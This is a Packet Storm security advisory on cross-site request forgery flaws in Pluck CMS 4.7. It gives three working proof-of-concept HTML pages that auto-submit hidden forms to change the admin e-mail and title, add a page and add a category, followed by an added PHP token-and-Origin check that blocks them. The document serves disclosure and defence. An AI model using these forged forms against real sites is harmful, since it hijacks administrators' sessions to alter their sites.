Pluck CMS 4.7 Cross Site Request Forgery

2012-02-10T00:00:00
ID PACKETSTORM:109632
Type packetstorm
Reporter Gordon Security
Modified 2012-02-10T00:00:00

Description

                                        
`# Exploit Title: Pluck cms multiple vulnerabilities  
# Date: 09/01/2012  
# Author: Gordon Security  
# Vendor or Software Link: www.pluck-cms.org  
# Version: 4.7  
# Category: webapps  
# Website:www.gordon-security.blogspot.com  
C.S.R.F. #1  
#[p.o.c.] Change admin e-mail and blog title  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to change Admin E-mail and Blog Title</H2>  
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=settings">  
<input type="hidden" name="cont1" value="Gordon Security"/>  
<input type="hidden" name="cont2" value="gordon_@hotmail.it"/>  
<input type="hidden" name="save" value="Salva"/>  
</form>  
</body>  
</html>  
C.S.R.F. #2  
#[p.o.c.] Add page to blog  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to add page</H2>  
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=editpage">  
<input type="hidden" name="title" value="Exploit"/>  
<input type="hidden" name="content" value="<p>Exploited</p>"/>  
<input type="hidden" name="description" value=""/>  
<input type="hidden" name="keywords" value=""/>  
<input type="hidden" name="hidden" value="no"/>  
<input type="hidden" name="sub_page" value=""/>  
<input type="hidden" name="theme" value="default"/>  
<input type="hidden" name="save_exit" value="Save and Exit"/>  
</form>  
</body>  
</html>  
C.S.R.F #3  
#[p.o.c.] Add category  
<html>  
<title>Gordon Security</title>  
<body onload="javascript:document.forms[0].submit()">  
<H3>www.gordon-security.blogspot.com</H3>  
<H2>CSRF Exploit to add category</H2>  
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?module=blog">  
<input type="hidden" name="cont1" value="Hacking"/>  
<input type="hidden" name="Submit" value="Salva"/>  
</form>  
</body>  
</html>  
  
  
  
`
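
The three proof-of-concept forms above succeed because the admin endpoints act on a POST that carries nothing beyond the administrator's session cookie. A server-side check of the kind that rejects them, as an added example: this is not code from Pluck or from the advisory author, the function names and the csrf_token field are hypothetical, and the request bodies are constructed from the field names in the PoCs.

```php
<?php
// Added example, not Pluck's code. csrf_issue_token(), csrf_request_allowed()
// and the csrf_token field are hypothetical names chosen for illustration.

// Create (once per session) the secret that every admin form embeds as a hidden field.
function csrf_issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing admin request may proceed.
function csrf_request_allowed(string $method, array $headers, array $post,
                              array $session, string $siteOrigin): bool {
    if ($method !== 'POST') {
        return false;   // settings, page and category changes are POST only
    }
    // Browsers attach Origin to cross-site form POSTs; reject a foreign one.
    if (isset($headers['Origin']) && $headers['Origin'] !== $siteOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Constant-time comparison; a missing or empty token never matches.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed demo: bodies shaped like the three forged forms, then a genuine one.
$session = [];
$token   = csrf_issue_token($session);
$site    = 'http://127.0.0.1';
$forged  = [
    'action=settings' => ['cont1' => 'New title', 'cont2' => 'x@example.invalid', 'save' => 'Salva'],
    'action=editpage' => ['title' => 'Page', 'content' => '<p>text</p>', 'save_exit' => 'Save and Exit'],
    'module=blog'     => ['cont1' => 'Category', 'Submit' => 'Salva'],
];
foreach ($forged as $name => $body) {
    // The forged page lives on another origin and cannot read the session token.
    $ok = csrf_request_allowed('POST', ['Origin' => 'http://other.example'], $body, $session, $site);
    echo $name, ' forged: ', $ok ? 'ACCEPTED' : 'rejected', PHP_EOL;
}
$genuine = $forged['action=settings'] + ['csrf_token' => $token];
$ok = csrf_request_allowed('POST', ['Origin' => $site], $genuine, $session, $site);
echo 'action=settings with token: ', $ok ? 'accepted' : 'REJECTED', PHP_EOL;
```

Setting the session cookie with SameSite=Lax or Strict adds a second layer, since the browser then withholds the cookie from cross-site POSTs.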